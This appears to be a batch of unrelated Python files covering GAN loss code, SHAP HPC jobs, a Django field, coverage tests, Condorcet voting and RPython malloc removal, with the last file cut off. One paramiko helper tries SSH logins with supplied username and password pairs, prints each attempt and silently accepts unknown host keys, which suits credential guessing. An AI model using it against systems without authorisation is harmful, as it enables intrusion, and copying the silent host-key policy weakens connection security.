plzsep_noise = torch.randn_like(gen_img) / np.sqrt(gen_img.shape[2] * gen_img.shape[3])
with torch.autograd.profiler.record_function('plzsep_grads'), conv2d_gradfix.no_weight_gradients():
plzsep_grads = torch.autograd.grad(outputs=[(gen_img * plzsep_noise).sum()], inputs=[gen_z_used],
create_graph=True, only_inputs=True)[0]
gen_z_used.requires_grad = False
plzsep_lengths = plzsep_grads.square().sqrt()
plzsep_mean = self.plzsep_mean.lerp(plzsep_lengths.mean(dim=0), self.plzsep_decay)
self.plzsep_mean.copy_(plzsep_mean.detach())
plzsep_penalty = (plzsep_lengths - plzsep_mean).square().sum()
training_stats.report('Loss/plzsep_penalty', plzsep_penalty)
loss_Gplzsep = plzsep_penalty * self.plzsep_weight
training_stats.report('Loss/G/plzsep_reg', loss_Gplzsep)
with torch.autograd.profiler.record_function('Gplzsep_backward'):
(gen_img[:, 0, 0, 0] * 0 + loss_Gplzsep).mean().mul(gain).backward()
# Gw1reg: Constrain first-layer w by different latent dimensions.
if do_Gw1reg:
with torch.autograd.profiler.record_function('Gw1reg_forward'):
w1 = getattr(self.G_mapping.module, f'fc{0}').weight # (out, z_in)
cur_device = w1.device
reg = self.get_w1reg_scale(w1, cur_device)
w1_sq = torch.sum(w1 * w1, dim=0) # (z_in)
loss_w1reg = torch.sum(w1_sq * reg, dim=0) * self.w1reg_lambda
training_stats.report('Loss/G/loss_w1reg', loss_w1reg)
with torch.autograd.profiler.record_function('Gw1reg_backward'):
loss_w1reg.mean().mul(gain).backward()
#----------------------------------------------------------------------------
| python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from pathlib import Path
from wildfires.utils import handle_array_job_args
try:
# This will only work after the path modification carried out in the job script.
from specific import (
CACHE_DIR,
SimpleCache,
get_model,
data_split_cache,
get_shap_values,
)
except ImportError:
"""Not running as an HPC job yet."""
def func():
# Used to re-compute specific failed jobs, `None` otherwise.
indices = [
2,
3,
6,
7,
14,
15,
16,
17,
19,
21,
22,
28,
29,
35,
36,
52,
53,
54,
55,
59,
60,
61,
62,
68,
69,
70,
71,
72,
73,
76,
81,
82,
83,
84,
94,
98,
99,
100,
101,
102,
103,
104,
105,
106,
107,
108,
109,
111,
112,
113,
114,
115,
116,
117,
118,
119,
123,
124,
125,
129,
130,
132,
133,
134,
135,
141,
142,
155,
156,
170,
171,
172,
173,
175,
176,
177,
178,
183,
184,
185,
186,
188,
189,
196,
201,
202,
203,
204,
220,
221,
222,
223,
224,
225,
226,
227,
228,
229,
230,
231,
232,
235,
236,
237,
238,
239,
240,
241,
245,
246,
252,
254,
255,
257,
258,
261,
262,
263,
264,
266,
267,
276,
277,
311,
312,
313,
314,
316,
319,
320,
321,
327,
328,
329,
330,
331,
332,
338,
341,
342,
343,
344,
369,
372,
373,
374,
375,
376,
377,
378,
379,
380,
381,
382,
383,
384,
385,
386,
387,
388,
393,
395,
396,
401,
402,
409,
410,
411,
412,
413,
414,
422,
423,
437,
438,
439,
440,
441,
444,
445,
447,
453,
454,
455,
456,
457,
459,
462,
470,
471,
472,
473,
508,
509,
510,
511,
512,
513,
514,
515,
516,
519,
520,
521,
522,
523,
524,
525,
526,
527,
528,
535,
536,
537,
539,
540,
543,
544,
545,
546,
548,
549,
]
index = int(os.environ["PBS_ARRAY_INDEX"])
if indices is not None:
index = indices[index]
print("Index:", index)
X_train, X_test, y_train, y_test = data_split_cache.load()
rf = get_model()
job_samples = 50
tree_path_dependent_shap_interact_cache = SimpleCache(
f"tree_path_dependent_shap_interact_{index}_{job_samples}",
cache_dir=os.path.join(CACHE_DIR, "shap_interaction"),
)
@tree_path_dependent_shap_interact_cache
def cached_get_interact_shap_values(model, X):
return get_shap_values(model, X, interaction=True)
cached_get_interact_shap_values(
rf, X_train[index * job_samples : (index + 1) * job_samples]
)
if __name__ == "__main__":
handle_array_job_args(
Path(__file__).resolve(),
func,
ncpus=1,
mem="7gb",
walltime="11:00:00",
max_index=221,
)
| python |
import aiohttp
import asyncio
import json
import time
from pydigitalstrom.client import DSClient
from pydigitalstrom.log import DSLog
class DSWebsocketEventListener:
def __init__(self, client: DSClient, event_name: str):
self._client = client
self._event_name = event_name
self._callbacks = []
self._ws = None
self._last_keepalive = None
def register(self, callback: callable):
self._callbacks.append(callback)
async def _get_cookie(self):
return dict(token=await self._client.get_session_token())
async def start(self):
session = await self._client.get_aiohttp_session(
cookies=await self._get_cookie()
)
url = f"wss://{self._client.host}:{self._client.port}/websocket"
self._ws = session.ws_connect(url=url)
async with self._ws as ws:
async for msg in ws:
if msg.type == aiohttp.WSMsgType.TEXT:
await self._handle_event(event=json.loads(msg.data))
else:
DSLog.logger.warn(f"DS websocket got unknown command: {msg}")
async def stop(self):
if self._ws is not None:
await self._ws.close()
self._ws = None
async def _handle_event(self, event: dict):
if "name" not in event:
return
if event["name"] == "keepWebserviceAlive":
self._last_keepalive = time.time() * 1000.0
# subscribed event
if event["name"] == self._event_name:
for callback in self._callbacks:
await callback(event=event)
| python |
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
class OrderField(models.PositiveIntegerField):
def __init__(self, for_fields=None, *args, **kwargs):
self.for_fields = for_fields
super().__init__(*args, **kwargs)
def pre_save(self, model_instance, add):
if getattr(model_instance, self.attname) is None:
# no current value
try:
qs = self.model.objects.all()
if self.for_fields:
# filter by objects with the same field values
# for the fields in "for_fields"
query = {field: getattr(model_instance, field) for field in self.for_fields}
qs = qs.filter(**query)
# get the order of the last item
last_item = qs.latest(self.attname)
value = last_item.order + 1
except ObjectDoesNotExist:
value = 0
setattr(model_instance, self.attname, value)
return value
else:
return super().pre_save(model_instance, add)
| python |
# Copyright 2020 Lynn Root
"""Functional tests for interrogate/coverage.py."""
import os
import sys
import pytest
from interrogate import config
from interrogate import coverage
HERE = os.path.abspath(os.path.join(os.path.abspath(__file__), os.path.pardir))
SAMPLE_DIR = os.path.join(HERE, "sample")
FIXTURES = os.path.join(HERE, "fixtures")
IS_WINDOWS = sys.platform in ("cygwin", "win32")
@pytest.mark.parametrize(
"paths,conf,exp_results",
(
([os.path.join(SAMPLE_DIR, "empty.py"),], {}, (1, 0, 1, "0.0")),
(
[os.path.join(SAMPLE_DIR, "empty.py"),],
{"ignore_module": True},
(0, 0, 0, "0.0"),
),
([SAMPLE_DIR,], {}, (56, 26, 30, "46.4")),
([os.path.join(SAMPLE_DIR, "partial.py")], {}, (22, 7, 15, "31.8")),
(
[os.path.join(SAMPLE_DIR, "full.py"),],
{"ignore_nested_functions": True},
(17, 17, 0, "100.0"),
),
(
[os.path.join(SAMPLE_DIR, "partial.py"),],
{"ignore_nested_functions": True},
(20, 6, 14, "30.0"),
),
),
)
def test_coverage_simple(paths, conf, exp_results, mocker):
"""Happy path - get expected results given a file or directory"""
conf = config.InterrogateConfig(**conf)
interrogate_coverage = coverage.InterrogateCoverage(paths=paths, conf=conf)
results = interrogate_coverage.get_coverage()
assert exp_results[0] == results.total
assert exp_results[1] == results.covered
assert exp_results[2] == results.missing
assert exp_results[3] == "{:.1f}".format(results.perc_covered)
def test_coverage_errors(capsys):
"""Exit when no Python files are found."""
path = os.path.join(SAMPLE_DIR, "ignoreme.txt")
interrogate_coverage = coverage.InterrogateCoverage(paths=[path])
with pytest.raises(SystemExit, match="1"):
interrogate_coverage.get_coverage()
captured = capsys.readouterr()
assert "E: Invalid file" in captured.err
interrogate_coverage = coverage.InterrogateCoverage(paths=[FIXTURES])
with pytest.raises(SystemExit, match="1"):
interrogate_coverage.get_coverage()
captured = capsys.readouterr()
assert "E: No Python files found to interrogate in " in captured.err
@pytest.mark.parametrize(
"level,exp_fixture_file",
(
# (0, "expected_no_verbosity.txt"),
# (1, "expected_summary.txt"),
(2, "expected_detailed.txt"),
),
)
def test_print_results(level, exp_fixture_file, capsys, monkeypatch):
"""Output of test results differ by verbosity."""
monkeypatch.setattr(coverage.utils.OutputFormatter, "TERMINAL_WIDTH", 80)
interrogate_coverage = coverage.InterrogateCoverage(paths=[SAMPLE_DIR])
results = interrogate_coverage.get_coverage()
interrogate_coverage.print_results(
results=results, output=None, verbosity=level
)
captured = capsys.readouterr()
expected_fixture = os.path.join(FIXTURES, exp_fixture_file)
if IS_WINDOWS:
expected_fixture = os.path.join(FIXTURES, "windows", exp_fixture_file)
with open(expected_fixture, "r") as f:
expected_out = f.read()
assert expected_out in captured.out
@pytest.mark.parametrize(
"ignore_module,level,exp_fixture_file",
(
(False, 2, "expected_detailed.txt"),
(True, 2, "expected_detailed_no_module.txt"),
(False, 1, "expected_summary.txt"),
(True, 1, "expected_summary_no_module.txt"),
),
)
def test_print_results_ignore_module(
ignore_module, level, exp_fixture_file, capsys, monkeypatch
):
"""Do not print module info if ignore_module is True."""
monkeypatch.setattr(coverage.utils.OutputFormatter, "TERMINAL_WIDTH", 80)
conf = {"ignore_module": ignore_module}
conf = config.InterrogateConfig(**conf)
interrogate_coverage = coverage.InterrogateCoverage(
paths=[SAMPLE_DIR], conf=conf
)
results = interrogate_coverage.get_coverage()
interrogate_coverage.print_results(
results=results, output=None, verbosity=level
)
captured = capsys.readouterr()
expected_fixture = os.path.join(FIXTURES, exp_fixture_file)
if IS_WINDOWS:
expected_fixture = os.path.join(FIXTURES, "windows", exp_fixture_file)
with open(expected_fixture, "r") as f:
expected_out = f.read()
assert expected_out in captured.out
def test_print_results_single_file(capsys, monkeypatch):
"""Results for a single file should still list the filename."""
monkeypatch.setattr(coverage.utils.OutputFormatter, "TERMINAL_WIDTH", 80)
single_file = os.path.join(SAMPLE_DIR, "full.py")
interrogate_coverage = coverage.InterrogateCoverage(paths=[single_file])
results = interrogate_coverage.get_coverage()
interrogate_coverage.print_results(
results=results, output=None, verbosity=2
)
captured = capsys.readouterr()
expected_fixture = os.path.join(
FIXTURES, "expected_detailed_single_file.txt"
)
if IS_WINDOWS:
expected_fixture = os.path.join(
FIXTURES, "windows", "expected_detailed_single_file.txt"
)
with open(expected_fixture, "r") as f:
expected_out = f.read()
assert expected_out in captured.out
# I don't want to deal with path mocking out just to get tests to run
# everywhere
if not IS_WINDOWS:
assert "tests/functional/sample/" in captured.out
assert "tests/functional/sample/full.py" not in captured.out
else:
assert "tests\\functional\\sample\\" in captured.out
assert "tests\\functional\\sample\\full.py" not in captured.out
| python |
# Inspired by:
# https://codereview.stackexchange.com/questions/42359/condorcet-voting-method-in-oop-python
# and https://github.com/bradbeattie/python-vote-core/tree/master/pyvotecore
import sys
import os
import itertools
def main():
file = sys.argv[1]
if not os.path.isfile(file):
print("File path {} does not exist. Exiting...".format(file))
sys.exit()
vote_results = get_data_from_file(file)
print("The votes are {}.".format(vote_results))
choices, scores = build_dict(vote_results)
results = matches_choices(choices, scores)
print("Pairwise results are {}.".format(results))
# return elect_winner(choices, results)
print("The winner is {}.".format(elect_winner(choices, results)))
def get_data_from_file(filepath):
"""
Parses data from input file
"""
vote_results = []
with open(filepath, encoding='utf-8') as file:
for lines in file:
if lines.startswith('#'):
pass
elif lines in ['\n', '\r\n']:
pass
else:
(one, two, three, four) = lines.split(None, 4)
vote_results.append((one, two, three, four))
return vote_results
def build_dict(votes):
"""
Builds a dictionary of scores
for each permutation of two choices
"""
choices = set()
scores = dict()
for voting in votes:
for choice in voting:
choices.add(choice)
for pair in list(itertools.permutations(voting, 2)):
if pair not in scores:
scores[pair] = 0
if voting.index(pair[0]) < voting.index(pair[1]):
scores[pair] += 1
return choices, scores
def matches_choices(choices, scores):
"""
Analyzes dictionary of scores and
gives the winner of each pair of choices
"""
results = dict()
for match in list(itertools.combinations(choices, 2)):
reverse = tuple(reversed(match))
if scores[match] > scores[reverse]:
results[match] = match[0]
else:
results[match] = match[1]
return results
def elect_winner(choices, results):
"""
If a choice is a winner against
every other choice, declares winner.
Does not detect Condorcet cycles
"""
for choice in choices:
choice_score = 0
for result in results:
if choice in result and results[result] == choice:
choice_score += 1
if choice_score == len(choices) - 1:
return choice
if __name__ == '__main__':
main()
| python |
import os, time
def cmd(cmdd):
os.system(cmdd)
while(True):
time.sleep(2)
cmd("cls")
cmd("python app.py")
| python |
import getpass
import sys
from constants import cx_status
import paramiko
# setup logging
paramiko.util.log_to_file("/tmp/paramiko.log")
# Paramiko client configuration
UseGSSAPI = ( paramiko.GSS_AUTH_AVAILABLE)
DoGSSAPIKeyExchange = ( paramiko.GSS_AUTH_AVAILABLE)
class SilentPolicy(paramiko.MissingHostKeyPolicy):
"""
Policy for ignoring an unknown host key, but
accepting it. This is used by `.SSHClient`.
"""
def missing_host_key(self, client, hostname, key):
pass
def try_login(hostname, port, username, password, verbose, timeout):
try:
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(SilentPolicy())
if verbose:
print("Trying to connect... {}/{}@{}:{}".format(username, password, hostname, port))
if not UseGSSAPI and not DoGSSAPIKeyExchange:
try:
client.connect(hostname, port, username, password,
timeout=timeout, banner_timeout=timeout, auth_timeout=timeout)
except paramiko.ssh_exception.NoValidConnectionsError:
# closed port
return cx_status.NOT_LISTENING
except paramiko.ssh_exception.AuthenticationException:
return cx_status.ERROR
except Exception:
try:
client.close()
except Exception:
pass
# filtered port
return cx_status.NOT_LISTENING
else:
raise ("not tested code")
try:
client.connect( hostname, port, username, gss_auth=UseGSSAPI, gss_kex=DoGSSAPIKeyExchange,
timeout=timeout, banner_timeout=timeout, auth_timeout=timeout)
except Exception:
password = getpass.getpass( "Password for %s@%s: " % (username, hostname))
try:
client.connect(hostname, port, username, password,
timeout=timeout, banner_timeout=timeout, auth_timeout=timeout)
try:
client.close()
except Exception:
pass
except Exception:
try:
client.close()
except Exception:
pass
return cx_status.ERROR
chan = client.invoke_shell()
chan.close()
client.close()
return cx_status.CONNECTED
except Exception as e:
print("*** Caught exception: %s: %s" % (e.__class__, e))
try:
client.close()
except:
pass
return cx_status.ERROR
| python |
# Utilities for reading score-files
import numpy as np
from utils.data_loading import readlines_and_split_spaces
def load_scorefile_and_split_to_arrays(scorefile_path):
"""
Load a scorefile where each line has multiple columns
separated by whitespace, and split each column to its own
array
"""
scorefile_lines = readlines_and_split_spaces(scorefile_path)
arrays = [np.array(column) for column in zip(*scorefile_lines)]
return arrays
def load_scorefile_and_split_scores(scorefile_path):
"""
Load a scorefile with following structure and
return three arrays: target_scores, nontarget_scores and original_scores
Each line is
is_target score [optional ...]
where is_target is either "True" or "False".
score is a float
"""
scorefile_lines = readlines_and_split_spaces(scorefile_path)
target_scores = []
nontarget_scores = []
original_scores = []
for score_line in scorefile_lines:
# Some trials are None (because files are missing).
# Skip them
if score_line[1] == "None":
continue
is_target = score_line[0] == "True"
score = float(score_line[1])
original_scores.append(score)
if is_target:
target_scores.append(score)
else:
nontarget_scores.append(score)
target_scores = np.array(target_scores)
nontarget_scores = np.array(nontarget_scores)
original_scores = np.array(original_scores)
return target_scores, nontarget_scores, original_scores
| python |
import numpy as np
from numpngw import write_apng
# Example 5
#
# Create an 8-bit RGB animated PNG file.
height = 20
width = 200
t = np.linspace(0, 10*np.pi, width)
seq = []
for phase in np.linspace(0, 2*np.pi, 25, endpoint=False):
y = 150*0.5*(1 + np.sin(t - phase))
a = np.zeros((height, width, 3), dtype=np.uint8)
a[:, :, 0] = y
a[:, :, 2] = y
seq.append(a)
write_apng("example5.png", seq, delay=50, use_palette=True)
| python |
from django.apps import AppConfig
class TmplConfig(AppConfig):
name = 'tmpl'
| python |
from rpython.flowspace.model import Variable, Constant, Block, Link
from rpython.flowspace.model import SpaceOperation, FunctionGraph, copygraph
from rpython.flowspace.model import checkgraph
from rpython.flowspace.model import c_last_exception
from rpython.translator.backendopt.support import log
from rpython.translator.simplify import join_blocks
from rpython.translator.unsimplify import varoftype
from rpython.rtyper.typesystem import getfunctionptr
from rpython.rtyper.lltypesystem import lltype
from rpython.rtyper.lltypesystem.lloperation import llop
def virtualize_mallocs(translator, graphs, verbose=False):
newgraphs = graphs[:]
mallocv = MallocVirtualizer(newgraphs, translator.rtyper, verbose)
while mallocv.remove_mallocs_once():
pass
for graph in newgraphs:
checkgraph(graph)
join_blocks(graph)
assert newgraphs[:len(graphs)] == graphs
del newgraphs[:len(graphs)]
translator.graphs.extend(newgraphs)
# ____________________________________________________________
class MallocTypeDesc(object):
def __init__(self, MALLOCTYPE):
if not isinstance(MALLOCTYPE, lltype.GcStruct):
raise CannotRemoveThisType
self.MALLOCTYPE = MALLOCTYPE
self.check_no_destructor()
self.names_and_types = []
self.name2index = {}
self.name2subtype = {}
self.initialize_type(MALLOCTYPE)
#self.immutable_struct = MALLOCTYPE._hints.get('immutable')
def check_no_destructor(self):
STRUCT = self.MALLOCTYPE
try:
rttiptr = lltype.getRuntimeTypeInfo(STRUCT)
except ValueError:
return # ok
destr_ptr = getattr(rttiptr._obj, 'destructor_funcptr', None)
if destr_ptr:
raise CannotRemoveThisType
def initialize_type(self, TYPE):
fieldnames = TYPE._names
firstname, FIRSTTYPE = TYPE._first_struct()
if FIRSTTYPE is not None:
self.initialize_type(FIRSTTYPE)
fieldnames = fieldnames[1:]
for name in fieldnames:
FIELDTYPE = TYPE._flds[name]
if isinstance(FIELDTYPE, lltype.ContainerType):
raise CannotRemoveThisType("inlined substructure")
self.name2index[name] = len(self.names_and_types)
self.names_and_types.append((name, FIELDTYPE))
self.name2subtype[name] = TYPE
class SpecNode(object):
pass
class RuntimeSpecNode(SpecNode):
def __init__(self, name, TYPE):
self.name = name
self.TYPE = TYPE
def newvar(self):
v = Variable(self.name)
v.concretetype = self.TYPE
return v
def getfrozenkey(self, memo):
return 'R'
def accumulate_nodes(self, rtnodes, vtnodes):
rtnodes.append(self)
def copy(self, memo, flagreadonly):
return RuntimeSpecNode(self.name, self.TYPE)
def bind_rt_nodes(self, memo, newnodes_iter):
return newnodes_iter.next()
class VirtualSpecNode(SpecNode):
def __init__(self, typedesc, fields, readonly=False):
self.typedesc = typedesc
self.fields = fields # list of SpecNodes
self.readonly = readonly
def getfrozenkey(self, memo):
if self in memo:
return memo[self]
else:
memo[self] = len(memo)
result = [self.typedesc, self.readonly]
for subnode in self.fields:
result.append(subnode.getfrozenkey(memo))
return tuple(result)
def accumulate_nodes(self, rtnodes, vtnodes):
if self in vtnodes:
return
vtnodes[self] = True
for subnode in self.fields:
subnode.accumulate_nodes(rtnodes, vtnodes)
def copy(self, memo, flagreadonly):
if self in memo:
return memo[self]
readonly = self.readonly or self in flagreadonly
newnode = VirtualSpecNode(self.typedesc, [], readonly)
memo[self] = newnode
for subnode in self.fields:
newnode.fields.append(subnode.copy(memo, flagreadonly))
return newnode
def bind_rt_nodes(self, memo, newnodes_iter):
if self in memo:
return memo[self]
newnode = VirtualSpecNode(self.typedesc, [], self.readonly)
memo[self] = newnode
for subnode in self.fields:
newnode.fields.append(subnode.bind_rt_nodes(memo, newnodes_iter))
return newnode
class VirtualFrame(object):
def __init__(self, sourceblock, nextopindex,
allnodes, callerframe=None, calledgraphs={}):
if isinstance(allnodes, dict):
self.varlist = vars_alive_through_op(sourceblock, nextopindex)
self.nodelist = [allnodes[v] for v in self.varlist]
else:
assert nextopindex == 0
self.varlist = sourceblock.inputargs
self.nodelist = allnodes[:]
self.sourceblock = sourceblock
self.nextopindex = nextopindex
self.callerframe = callerframe
self.calledgraphs = calledgraphs
def get_nodes_in_use(self):
return dict(zip(self.varlist, self.nodelist))
def shallowcopy(self):
newframe = VirtualFrame.__new__(VirtualFrame)
newframe.varlist = self.varlist
newframe.nodelist = self.nodelist
newframe.sourceblock = self.sourceblock
newframe.nextopindex = self.nextopindex
newframe.callerframe = self.callerframe
newframe.calledgraphs = self.calledgraphs
return newframe
def copy(self, memo, flagreadonly={}):
newframe = self.shallowcopy()
newframe.nodelist = [node.copy(memo, flagreadonly)
for node in newframe.nodelist]
if newframe.callerframe is not None:
newframe.callerframe = newframe.callerframe.copy(memo,
flagreadonly)
return newframe
def enum_call_stack(self):
frame = self
while frame is not None:
yield frame
frame = frame.callerframe
def getfrozenkey(self):
memo = {}
key = []
for frame in self.enum_call_stack():
key.append(frame.sourceblock)
key.append(frame.nextopindex)
for node in frame.nodelist:
key.append(node.getfrozenkey(memo))
return tuple(key)
def find_all_nodes(self):
rtnodes = []
vtnodes = {}
for frame in self.enum_call_stack():
for node in frame.nodelist:
node.accumulate_nodes(rtnodes, vtnodes)
return rtnodes, vtnodes
def find_rt_nodes(self):
rtnodes, vtnodes = self.find_all_nodes()
return rtnodes
def find_vt_nodes(self):
rtnodes, vtnodes = self.find_all_nodes()
return vtnodes
def copynodes(nodelist, flagreadonly={}):
memo = {}
return [node.copy(memo, flagreadonly) for node in nodelist]
def find_all_nodes(nodelist):
rtnodes = []
vtnodes = {}
for node in nodelist:
node.accumulate_nodes(rtnodes, vtnodes)
return rtnodes, vtnodes
def is_trivial_nodelist(nodelist):
for node in nodelist:
if not isinstance(node, RuntimeSpecNode):
return False
return True
def bind_rt_nodes(srcnodelist, newnodes_list):
"""Return srcnodelist with all RuntimeNodes replaced by nodes
coming from newnodes_list.
"""
memo = {}
newnodes_iter = iter(newnodes_list)
result = [node.bind_rt_nodes(memo, newnodes_iter) for node in srcnodelist]
rest = list(newnodes_iter)
assert rest == [], "too many nodes in newnodes_list"
return result
class CannotVirtualize(Exception):
pass
class ForcedInline(Exception):
pass
class CannotRemoveThisType(Exception):
pass
# ____________________________________________________________
class MallocVirtualizer(object):
def __init__(self, graphs, rtyper, verbose=False):
self.graphs = graphs
self.rtyper = rtyper
self.excdata = rtyper.getexceptiondata()
self.graphbuilders = {}
self.specialized_graphs = {}
self.specgraphorigin = {}
self.inline_and_remove = {} # {graph: op_to_remove}
self.inline_and_remove_seen = {} # set of (graph, op_to_remove)
self.malloctypedescs = {}
self.count_virtualized = 0
self.verbose = verbose
self.EXCTYPE_to_vtable = self.build_obscure_mapping()
def build_obscure_mapping(self):
result = {}
for rinstance in self.rtyper.instance_reprs.values():
result[rinstance.lowleveltype.TO] = rinstance.rclass.getvtable()
return result
def report_result(self, progress):
if progress:
log.mallocv('removed %d mallocs so far' % self.count_virtualized)
else:
log.mallocv('done')
def enum_all_mallocs(self, graph):
for block in graph.iterblocks():
for op in block.operations:
if op.opname == 'malloc':
MALLOCTYPE = op.result.concretetype.TO
try:
self.getmalloctypedesc(MALLOCTYPE)
except CannotRemoveThisType:
pass
else:
yield (block, op)
elif op.opname == 'direct_call':
graph = graph_called_by(op)
if graph in self.inline_and_remove:
yield (block, op)
def remove_mallocs_once(self):
self.flush_failed_specializations()
prev = self.count_virtualized
count_inline_and_remove = len(self.inline_and_remove)
for graph in self.graphs:
seen = {}
while True:
for block, op in self.enum_all_mallocs(graph):
if op.result not in seen:
seen[op.result] = True
if self.try_remove_malloc(graph, block, op):
break # graph mutated, restart enum_all_mallocs()
else:
break # enum_all_mallocs() exhausted, graph finished
progress1 = self.count_virtualized - prev
progress2 = len(self.inline_and_remove) - count_inline_and_remove
progress = progress1 or bool(progress2)
self.report_result(progress)
return progress
def flush_failed_specializations(self):
for key, (mode, specgraph) in self.specialized_graphs.items():
if mode == 'fail':
del self.specialized_graphs[key]
def fixup_except_block(self, exceptblock):
# hack: this block's inputargs may be missing concretetypes...
e1, v1 = exceptblock.inputargs
e1.concretetype = self.excdata.lltype_of_exception_type
v1.concretetype = self.excdata.lltype_of_exception_value
def getmalloctypedesc(self, MALLOCTYPE):
try:
dsc = self.malloctypedescs[MALLOCTYPE]
except KeyError:
dsc = self.malloctypedescs[MALLOCTYPE] = MallocTypeDesc(MALLOCTYPE)
return dsc
def try_remove_malloc(self, graph, block, op):
if (graph, op) in self.inline_and_remove_seen:
return False # no point in trying again
graphbuilder = GraphBuilder(self, graph)
if graph in self.graphbuilders:
graphbuilder.initialize_from_old_builder(self.graphbuilders[graph])
graphbuilder.start_from_a_malloc(graph, block, op.result)
try:
graphbuilder.propagate_specializations()
except CannotVirtualize, e:
self.logresult(op, 'failed', e)
return False
except ForcedInline, e:
self.logresult(op, 'forces inlining', e)
self.inline_and_remove[graph] = op
self.inline_and_remove_seen[graph, op] = True
return False
else:
self.logresult(op, 'removed')
graphbuilder.finished_removing_malloc()
self.graphbuilders[graph] = graphbuilder
self.count_virtualized += 1
return True
def logresult(self, op, msg, exc=None): # only for nice log outputs
if self.verbose:
if exc is None:
exc = ''
else:
exc = ': %s' % (exc,)
chain = []
while True:
chain.append(str(op.result))
if op.opname != 'direct_call':
break
fobj = op.args[0].value._obj
op = self.inline_and_remove[fobj.graph]
log.mallocv('%s %s%s' % ('->'.join(chain), msg, exc))
elif exc is None:
log.dot()
def get_specialized_graph(self, graph, nodelist):
assert len(graph.getargs()) == len(nodelist)
if is_trivial_nodelist(nodelist):
return 'trivial', graph
if graph in self.specgraphorigin:
orggraph, orgnodelist = self.specgraphorigin[graph]
nodelist = bind_rt_nodes(orgnodelist, nodelist)
graph = orggraph
virtualframe = VirtualFrame(graph.startblock, 0, nodelist)
key = virtualframe.getfrozenkey()
try:
return self.specialized_graphs[key]
except KeyError:
self.build_specialized_graph(graph, key, nodelist)
return self.specialized_graphs[key]
def build_specialized_graph(self, graph, key, nodelist):
graph2 = copygraph(graph)
virtualframe = VirtualFrame(graph2.startblock, 0, nodelist)
graphbuilder = GraphBuilder(self, graph2)
specblock = graphbuilder.start_from_virtualframe(virtualframe)
specgraph = graph2
specgraph.name += '_mallocv'
specgraph.startblock = specblock
self.specialized_graphs[key] = ('call', specgraph)
try:
graphbuilder.propagate_specializations()
except ForcedInline, e:
if self.verbose:
log.mallocv('%s inlined: %s' % (graph.name, e))
self.specialized_graphs[key] = ('inline', None)
except CannotVirtualize, e:
if self.verbose:
log.mallocv('%s failing: %s' % (graph.name, e))
self.specialized_graphs[key] = ('fail', None)
else:
self.graphbuilders[specgraph] = graphbuilder
self.specgraphorigin[specgraph] = graph, nodelist
self.graphs.append(specgraph)
class GraphBuilder(object):
def __init__(self, mallocv, graph):
self.mallocv = mallocv
self.graph = graph
self.specialized_blocks = {}
self.pending_specializations = []
def initialize_from_old_builder(self, oldbuilder):
self.specialized_blocks.update(oldbuilder.specialized_blocks)
def start_from_virtualframe(self, startframe):
spec = BlockSpecializer(self)
spec.initialize_renamings(startframe)
self.pending_specializations.append(spec)
return spec.specblock
def start_from_a_malloc(self, graph, block, v_result):
assert v_result in [op.result for op in block.operations]
nodelist = []
for v in block.inputargs:
nodelist.append(RuntimeSpecNode(v, v.concretetype))
trivialframe = VirtualFrame(block, 0, nodelist)
spec = BlockSpecializer(self, v_result)
spec.initialize_renamings(trivialframe, keep_inputargs=True)
self.pending_specializations.append(spec)
self.pending_patch = (block, spec.specblock)
def finished_removing_malloc(self):
(srcblock, specblock) = self.pending_patch
srcblock.inputargs = specblock.inputargs
srcblock.operations = specblock.operations
srcblock.exitswitch = specblock.exitswitch
srcblock.recloseblock(*specblock.exits)
def create_outgoing_link(self, currentframe, targetblock,
nodelist, renamings, v_expand_malloc=None):
assert len(nodelist) == len(targetblock.inputargs)
#
if is_except(targetblock):
v_expand_malloc = None
while currentframe.callerframe is not None:
currentframe = currentframe.callerframe
newlink = self.handle_catch(currentframe, nodelist, renamings)
if newlink:
return newlink
else:
targetblock = self.exception_escapes(nodelist, renamings)
assert len(nodelist) == len(targetblock.inputargs)
if (currentframe.callerframe is None and
is_trivial_nodelist(nodelist)):
# there is no more VirtualSpecNodes being passed around,
# so we can stop specializing
rtnodes = nodelist
specblock = targetblock
else:
if is_return(targetblock):
v_expand_malloc = None
newframe = self.return_to_caller(currentframe, nodelist[0])
else:
targetnodes = dict(zip(targetblock.inputargs, nodelist))
newframe = VirtualFrame(targetblock, 0, targetnodes,
callerframe=currentframe.callerframe,
calledgraphs=currentframe.calledgraphs)
rtnodes = newframe.find_rt_nodes()
specblock = self.get_specialized_block(newframe, v_expand_malloc)
linkargs = [renamings[rtnode] for rtnode in rtnodes]
return Link(linkargs, specblock)
def return_to_caller(self, currentframe, retnode):
callerframe = currentframe.callerframe
if callerframe is None:
raise ForcedInline("return block")
nodelist = callerframe.nodelist
callerframe = callerframe.shallowcopy()
callerframe.nodelist = []
for node in nodelist:
if isinstance(node, FutureReturnValue):
node = retnode
callerframe.nodelist.append(node)
return callerframe
def handle_catch(self, catchingframe, nodelist, renamings):
if not self.has_exception_catching(catchingframe):
return None
[exc_node, exc_value_node] = nodelist
v_exc_type = renamings.get(exc_node)
if isinstance(v_exc_type, Constant):
exc_type = v_exc_type.value
elif isinstance(exc_value_node, VirtualSpecNode):
EXCTYPE = exc_value_node.typedesc.MALLOCTYPE
exc_type = self.mallocv.EXCTYPE_to_vtable[EXCTYPE]
else:
raise CannotVirtualize("raising non-constant exc type")
excdata = self.mallocv.excdata
assert catchingframe.sourceblock.exits[0].exitcase is None
for catchlink in catchingframe.sourceblock.exits[1:]:
if excdata.fn_exception_match(exc_type, catchlink.llexitcase):
# Match found. Follow this link.
mynodes = catchingframe.get_nodes_in_use()
for node, attr in zip(nodelist,
['last_exception', 'last_exc_value']):
v = getattr(catchlink, attr)
if isinstance(v, Variable):
mynodes[v] = node
#
nodelist = []
for v in catchlink.args:
if isinstance(v, Variable):
node = mynodes[v]
else:
node = getconstnode(v, renamings)
nodelist.append(node)
return self.create_outgoing_link(catchingframe,
catchlink.target,
nodelist, renamings)
else:
# No match at all, propagate the exception to the caller
return None
def has_exception_catching(self, catchingframe):
if catchingframe.sourceblock.exitswitch != c_last_exception:
return False
else:
operations = catchingframe.sourceblock.operations
assert 1 <= catchingframe.nextopindex <= len(operations)
return catchingframe.nextopindex == len(operations)
def exception_escapes(self, nodelist, renamings):
# the exception escapes
if not is_trivial_nodelist(nodelist):
# start of hacks to help handle_catch()
[exc_node, exc_value_node] = nodelist
v_exc_type = renamings.get(exc_node)
if isinstance(v_exc_type, Constant):
# cannot improve: handle_catch() would already be happy
